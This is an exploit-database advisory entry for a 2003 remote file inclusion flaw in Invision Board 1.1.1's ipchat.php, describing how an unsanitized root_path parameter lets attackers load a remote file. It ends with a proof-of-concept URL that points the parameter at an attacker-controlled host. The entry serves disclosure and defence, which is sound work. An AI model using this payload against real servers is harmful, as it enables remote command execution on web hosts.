Lucene search

K
exploitdbFrogEDB-ID:22295
HistoryFeb 27, 2003 - 12:00 a.m.

Invision Board 1.1.1 - 'ipchat.php' Remote File Inclusion

2003-02-2700:00:00
frog
www.exploit-db.com
12

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/6976/info

Invision Board is prone to an issue that may allow remote attackers to include files located on attacker-controlled servers.

This vulnerability is as a result of insufficient sanitization performed on remote user supplied data used in URI parameters of certain PHP pages.

Under some circumstances, it may be possible for remote attackers to influence the include path for a global configuration file to point to an external file on a remote server.

If the remote file is a malicious file, this vulnerability may be exploited to execute arbitrary system commands in the context of the web server. 

http://www.example.com/ipchat.php?root_path=http://www.attacker.com/conf_global.php 

AI Score

7.4

Confidence

Low

Related for EDB-ID:22295